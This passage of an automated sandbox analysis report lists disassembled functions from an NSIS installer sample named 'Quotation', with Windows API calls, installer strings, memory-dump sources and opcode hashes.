                                                                                    • String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
                                                                                    • API String ID: 3050056751-1170945346
                                                                                    • Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                    • Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
                                                                                    • Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                    • Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                    • wsprintfW.USER32 ref: 004061CF
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2597019906.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2596978642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597064403.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597082588.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597201634.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-1946221925
                                                                                    • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                    • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                    • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                    • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                      • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                      • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                      • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2597019906.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2596978642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597064403.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597082588.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2597201634.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                    • API String ID: 2547128583-890815371
                                                                                    • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                    • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                    • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                    • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD